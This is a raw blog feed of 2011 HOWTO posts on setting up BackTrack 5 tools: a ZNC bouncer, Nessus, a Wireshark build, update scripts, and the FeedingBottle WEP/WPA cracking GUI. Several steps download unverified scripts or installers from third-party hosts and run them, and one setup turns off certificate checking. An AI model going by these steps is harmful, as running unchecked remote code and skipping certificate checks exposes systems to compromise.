[ ?? ] Load module &amp;lt;simple_away&amp;gt;? (yes/no) [no]: yes&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] -- IRC Servers --&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] IRC server (host only): freenode    &lt;br /&gt;
[ ?? ] [freenode] Port (1 to 65535) [6667]: 7000&lt;br /&gt;
[ ?? ] [freenode] Password (probably empty): &lt;br /&gt;
[ ?? ] Does this server use SSL? (probably no) (yes/no) [no]: yes&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Would you like to add another server? (yes/no) [no]: &lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] -- Channels --&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Would you like to add a channel for ZNC to automatically join? (yes/no) [yes]: yes&lt;br /&gt;
[ ?? ] Channel name: &amp;lt;Your Channel&amp;gt;&lt;br /&gt;
[ ?? ] Would you like to add another channel? (yes/no) [no]: &lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Would you like to setup another user? (yes/no) [no]: &lt;br /&gt;
[ ok ] Writing config [/home/samiux/.znc/configs/znc.conf]... &lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] To connect to this znc you need to connect to it as your irc server&lt;br /&gt;
[ ** ] using the port that you supplied.  You have to supply your login info&lt;br /&gt;
[ ** ] as the irc server password like so... user:pass.&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ** ] Try something like this in your IRC client...&lt;br /&gt;
[ ** ] /server &lt;znc_server_ip&gt; 6697 android:&amp;ltpass&amp;gt;&lt;br /&gt;
[ ** ] &lt;br /&gt;
[ ?? ] Launch znc now? (yes/no) [yes]: &lt;br /&gt;
[ ok ] Opening Config [/home/samiux/.znc/configs/znc.conf]... &lt;br /&gt;
[ ok ] Binding to port [+6697] using ipv4... &lt;br /&gt;
[ ** ] Loading user [samiux]&lt;br /&gt;
[ ok ] Loading Module [admin]... [/usr/lib/znc/admin.so]&lt;br /&gt;
[ ok ] Loading Module [chansaver]... [/usr/lib/znc/chansaver.so]&lt;br /&gt;
[ ok ] Loading Module [keepnick]... [/usr/lib/znc/keepnick.so]&lt;br /&gt;
[ ok ] Loading Module [simple_away]... [/usr/lib/znc/simple_away.so]&lt;br /&gt;
[ ok ] Adding Server [freenode +7000]... &lt;br /&gt;
[ ok ] Loading Global Module [webadmin]... [/usr/lib/znc/webadmin.so]&lt;br /&gt;
[ ok ] Forking into the background... [pid: 9141]&lt;br /&gt;
[ ** ] ZNC 0.092+deb3 - http://znc.sourceforge.net&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*** In case, you make a mistake and want to re-generate the config file.  You should delete the "&lt;code&gt;znc.conf&lt;/code&gt;" under "&lt;code&gt;/home/&amp;lt;Your name&amp;gt;/.znc&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;rm -R .znc&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Open XChat.  Under the "&lt;code&gt;Network List&lt;/code&gt;" window :&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;User Information&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Nickname : android&lt;br /&gt;
Second choice : android_&lt;br /&gt;
Third choice : android__&lt;br /&gt;
User name : android&lt;br /&gt;
Real name : Android&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Add&lt;/code&gt;" button on the right.  Then name it to "&lt;code&gt;My-BNC BNC&lt;/code&gt;" and highlight it.  Choose "&lt;code&gt;Edit&lt;/code&gt;", on the top big box change to "&lt;code&gt;irc.my-bnc.net/6697&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Only connect to chosen network : enable&lt;br /&gt;
Auto connect to this network : enable&lt;br /&gt;
&lt;br /&gt;
Username : android&lt;br /&gt;
&lt;br /&gt;
Use SSL for all servers in this networks : enable&lt;br /&gt;
Accept invalid certificate : enable&lt;br /&gt;
&lt;br /&gt;
Server password : androidpass&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Choose "&lt;code&gt;Connect&lt;/code&gt;" on the XChat window.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-6325709381481148180?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6325709381481148180'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/6325709381481148180'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/08/howto-anonymous-in-chatfreenodenet-with.html' title='HOWTO : Anonymous in chat.freenode.net with XChat'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8156731242081810503</id><published>2011-07-30T10:12:00.002+08:00</published><updated>2011-07-30T10:23:19.470+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Yet Another Update script for Back|Track 5</title><content type='html'>Maxfx at Back|Track Linux developed a script for updating the Back|Track 5 which is written in Python. You can update the Back|Track 5 and it's applications in one script.&lt;br /&gt;
&lt;br /&gt;
The current version is 0.6 at the time of this writing.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -vxf bt5up.tar&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Usage :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;./bt5up.py&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
You can also move the execute file to /bin or /usr/bin. Once moved the file to /bin or /usr/bin, you can run the script as the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;bt5up.py&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Source :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-experts-section/43189-python-script-update-add-tools-bt5.html"&gt;Yet Another Update script on Back|Track 5 forum&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-update-script-for-backtrack-5.html"&gt;Another update script written in C&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all! See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8156731242081810503?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8156731242081810503'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8156731242081810503'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-yet-another-update-script-for.html' title='HOWTO : Yet Another Update script for Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1651837170676669046</id><published>2011-07-24T10:12:00.005+08:00</published><updated>2011-07-24T12:25:41.908+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='OSVDB'/><category scheme='http://www.blogger.com/atom/ns#' term='Nessus'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Register to OSVDB and Nessus on Back|Track 5</title><content type='html'>&lt;b&gt;PART I : OSVDB&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to &lt;code&gt;http://osvdb.org&lt;/code&gt; to register your account and you will receive an email to activate your account.&lt;br /&gt;
&lt;br /&gt;
After the activation your account, you can login to OSVDB.  Go to "&lt;code&gt;Account&lt;/code&gt;" -- "&lt;code&gt;API&lt;/code&gt;" to copy the API code.&lt;br /&gt;
&lt;br /&gt;
Open a terminal, issue the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /pentest/enumeration/web/cms-explorer/osvdb.key&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Copy the API code onto the &lt;code&gt;osvdb.key&lt;/code&gt; file.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PART II : Nessus&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to &lt;code&gt;http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code&lt;/code&gt; and select "&lt;code&gt;Using Nessus at Home?&lt;/code&gt;" to register.&lt;br /&gt;
&lt;br /&gt;
You will receive an email.  Follows the instruction on the email to open a terminal and issue the command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
To create a user :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/opt/nessus/sbin/nessus-adduser&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** You can leave the rule field empty.&lt;br /&gt;
&lt;br /&gt;
Start the Nessus from the menu of Back|Track 5, "&lt;code&gt;BackTrack&lt;/code&gt;" -- "&lt;code&gt;Vulnerability Assessment&lt;/code&gt;" -- "&lt;code&gt;Vulnerability Scanners&lt;/code&gt;" -- "&lt;code&gt;Nessus&lt;/code&gt;" -- "&lt;code&gt;nessus start&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Or, just issue the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/nessusd start&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
After that, go to &lt;code&gt;https://localhost:8834/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1651837170676669046?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1651837170676669046'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1651837170676669046'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-register-to-osvdb-and-nessus-on.html' title='HOWTO : Register to OSVDB and Nessus on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-4882839618000280917</id><published>2011-07-24T02:29:00.007+08:00</published><updated>2011-07-30T10:17:59.610+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><title type='text'>HOWTO : Solves the Wireshark not loading on Back|Track 5</title><content type='html'>Back|Track 5 comes with Wireshark 1.6.1 as at July 24, 2011 (GMT +8)  However, it does not load properly due to missing a file namely "libwsutil.so.0".&lt;br /&gt;
&lt;br /&gt;
Therefore, we need to compile the latest SVN version of Wireshark from source.  The current SVN version is 1.7.0-SVN-38173 at time of this writing. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go &lt;code&gt;http://www.wireshark.org/download/automated/src/&lt;/code&gt; to get the latest version of the Wireshark.  The latest version at the time of this writing is 1.7.0-SVN-38173.&lt;br /&gt;
&lt;br /&gt;
*** Please note that the latest version as at July 25, 2011 is 1.7.0-SVN-38202.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get update&lt;br /&gt;
apt-get install libtool flex libgtk2.0-dev lua50&lt;br /&gt;
apt-get install dpatch libc-ares-dev docbook-xsl libpcre3-dev libcap-dev libgnutls-dev libkrb5-dev liblua5.1-0-dev libsmi2-dev libgeoip-dev xsltproc automake1.9&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strike&gt;&lt;code&gt;apt-get --purge remove wireshark&lt;/code&gt;&lt;/strike&gt;&lt;br /&gt;
&lt;br /&gt;
** Don't need to remove the previous wireshark.  So that the menu entry can be reminded unchanged. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvjf wireshark-1.7.0-SVN-&amp;lt;LATEST_VERSION&amp;gt;.tar.bz2&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd wireshark-1.7.0-SVN-&amp;lt;LATEST_VERSION&amp;gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;./autogen.sh&lt;br /&gt;
./configure&lt;br /&gt;
make debian-package&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;cd ..&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
If you are installed 64-bit Back|Track 5 :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;dpkg -i wireshark-common_1.7.0_amd64.deb wireshark_1.7.0_amd64.deb tshark_1.7.0_amd64.deb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
OR&lt;br /&gt;
&lt;br /&gt;
If you are installed 32-bit Back|Track 5 :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;dpkg -i wireshark-common_1.7.0_i386.deb wireshark_1.7.0_i386.deb tshark_1.7.0_i386.deb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/usr/bin/wireshark&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-4882839618000280917?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4882839618000280917'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/4882839618000280917'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-solves-wireshark-not-loading-on.html' title='HOWTO : Solves the Wireshark not loading on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5582849418401331619</id><published>2011-07-15T09:06:00.004+08:00</published><updated>2011-07-16T02:02:45.517+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ThinkPad X100e'/><category scheme='http://www.blogger.com/atom/ns#' term='RTL8191SE'/><category scheme='http://www.blogger.com/atom/ns#' term='r8192se_pci'/><category scheme='http://www.blogger.com/atom/ns#' term='Radeon'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Back|Track 5 on Lenovo ThinkPad X100e</title><content type='html'>Lenovo ThinkPad X100e (Type 3508-65B) is equipped with AMD Athlon Neo MV-40 CPU and Radeon Display card.  It does not work properly on Back|Track 5.&lt;br /&gt;
&lt;br /&gt;
This tutorial is going to show you how to install Back|Track 5 on the captioned hardware.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Boot up the Live CD or Live USB.  Select the first item.  Press "&lt;code&gt;Tab&lt;/code&gt;" key to add the following line to the end of the line displayed on the screen.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;radeon.modset=0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
After the Live CD or Live USB is booting up, open terminal and then issue the following command.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nano /etc/default/grub&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Locate :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Make it read as :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;GRUB_CMDLINE_LINUX_DEFAULT="text splash nomodeset vga=791 radeon.modset=0"&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Save and exit.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;update-grub&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;fix-splash&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Configure the wireless card.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2010/11/howto-rtl8191se-wireless-card-on.html"&gt;HOWTO : RTL8191SE wireless card on Back|Track 4 R2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install of AMD Catalyst 11.6 Proprietary driver.&lt;br /&gt;
&lt;br /&gt;
Go to &lt;a href="http://www.amd.com"&gt;AMD official site&lt;/a&gt; and download AMD Catalyst 11.6 Proprietary Linux x86 Display Driver which is released on June 15, 2011.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://www2.ati.com/drivers/linux/ati-driver-installer-11-6-x86.x86_64.run&lt;br /&gt;
chmod +x ati-driver-installer-11-6-x86.x86_64.run&lt;br /&gt;
./ati-driver-installer-11-6-x86.x86_64.run&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
** My Back|Track 5 is 64-bit so I download the 64-bit version of the driver.&lt;br /&gt;
&lt;br /&gt;
Follow the instruction on the screen to install the driver.  After the installation, you should reboot your system.&lt;br /&gt;
&lt;br /&gt;
Before reboot your system, issue the following command :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;fix-splash&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Install Pointing Device Settings for the TrackPoint system.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install gpointing-device-settings&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Go to "&lt;code&gt;System&lt;/code&gt;" -- "&lt;code&gt;Preferences&lt;/code&gt;" -- "&lt;code&gt;Pointing Devices&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
Select "&lt;code&gt;TPPS/2 IBM TrackPoint&lt;/code&gt;".  Choose "&lt;code&gt;Use middle button emulation&lt;/code&gt;" and "&lt;code&gt;Use wheel emulation&lt;/code&gt;".  Select "&lt;code&gt;2&lt;/code&gt;" for the button.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5582849418401331619?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5582849418401331619'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5582849418401331619'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-backtrack-5-on-lenovo-thinkpad.html' title='HOWTO : Back|Track 5 on Lenovo ThinkPad X100e'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5922848962776663117</id><published>2011-07-15T08:34:00.002+08:00</published><updated>2011-07-15T08:36:23.477+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='Flash'/><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>HOWTO : Adobe Flash 10.3 on Back|Track 5</title><content type='html'>&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to &lt;a href="http://get.adobe.com/flashplayer/"&gt;Flash official site&lt;/a&gt; to download current version (tar.gz).  It is 10.3.181.34 at the time of this writing.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Close all running Firefox.&lt;br /&gt;
&lt;br /&gt;
Extract the file "&lt;code&gt;install_flash_player_10_linux.tar.gz&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvzf install_flash_player_10_linux.tar.gz&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Move the "&lt;code&gt;libflashplayer.so&lt;/code&gt;" to its locations.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;chown root:root libflashplayer.so&lt;br /&gt;
chmod 0644 libflashplayer.so&lt;br /&gt;
mv -f libflashplayer.so /usr/lib/mozilla/plugins/&lt;br /&gt;
ln -s /usr/lib/mozilla/plugins/libflashplayer.so /usr/lib/firefox/plugins/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Delete the extracted files and directories.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;rm -R usr&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Source :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-how-tos/40353-backtrack-5-how-get-flash-player-working-gnome-kde-x64.html"&gt;Backtrack 5 - How to get flash player working on Gnome / KDE x64&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5922848962776663117?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5922848962776663117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5922848962776663117'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-adobe-flash-103-on-backtrack-5.html' title='HOWTO : Adobe Flash 10.3 on Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1015634391933906235</id><published>2011-07-14T15:50:00.003+08:00</published><updated>2011-07-30T10:21:43.043+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Update script for Back|Track 5</title><content type='html'>Sickness at Back|Track Linux developed a script for updating the Back|Track 5.  You can update the Back|Track 5 and it's applications in one script.&lt;br /&gt;
&lt;br /&gt;
The current version is 0.6 at the time of this writing.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://sickness.tor.hu/wp-content/uploads/2011/06/backtrack5_update.c&lt;br /&gt;
gcc -o backtrack5_update backtrack5_update.c&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Usage :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;./backtrack5_update&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
You can also move the execute file to /bin.  Once moved the file to /bin, you can run the script as the following :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;backtrack5_update&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Source :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-experts-section/41766-%5B-%5D-update-script-backtrack-5-a.html"&gt;Update script on Back|Track 5 forum&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-yet-another-update-script-for.html"&gt;Another update script written in Python&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1015634391933906235?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1015634391933906235'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1015634391933906235'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/07/howto-update-script-for-backtrack-5.html' title='HOWTO : Update script for Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-7875226999409547450</id><published>2011-07-14T13:21:00.004+08:00</published><updated>2011-07-14T13:31:10.599+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FeedingBottle'/><category scheme='http://www.blogger.com/atom/ns#' term='Beini'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA2'/><category scheme='http://www.blogger.com/atom/ns#' term='WEP'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA'/><title type='text'>HOWTO : FeedingBottle 3.2 on Back|Track 5</title><content type='html'>FeedingBottle is a Graphic User Interface (GUI) for Aircrack-ng and it is a project of &lt;a href="http://www.ibeini.com/index.htm"&gt;Beini&lt;/a&gt;.  Beini is based on Tiny Core Linux which is a wireless network security testing system.&lt;br /&gt;
&lt;br /&gt;
FeedingBottle can handle WEP, WPA, WPA2 as well as hidden SSID.&lt;br /&gt;
&lt;br /&gt;
FeedingBottle 3.2 is working well on Back|Track 5.  You can download it at &lt;a href="http://www.ibeini.com/download.html"&gt;here&lt;/a&gt;.  Extact and install it by the following commands.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;wget http://www.ibeini.com/beini_system/others/feedingbottle/feedingbottle3.2-backtrack5-gnome.zip&lt;br /&gt;
unzip feedingbottle3.2-backtrack5-gnome.zip&lt;br /&gt;
dpkg -i feedingbottle3.2-backtrack5-gnome.deb&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
After the installation, you can find it at "&lt;code&gt;Applications&lt;/code&gt;" -- "&lt;code&gt;BackTrack&lt;/code&gt;" -- "&lt;code&gt;Exploitation Tools&lt;/code&gt;" -- "&lt;code&gt;Wireless Exploitation Tools&lt;/code&gt;" -- "&lt;code&gt;WLAN Exploition&lt;/code&gt;" -- "&lt;code&gt;FeedingBottle3.2&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
For the usage, please visit the official site at &lt;a href="http://www.ibeini.com/videos.htm"&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
There are simple and advanced modes for you to use.&lt;br /&gt;
&lt;br /&gt;
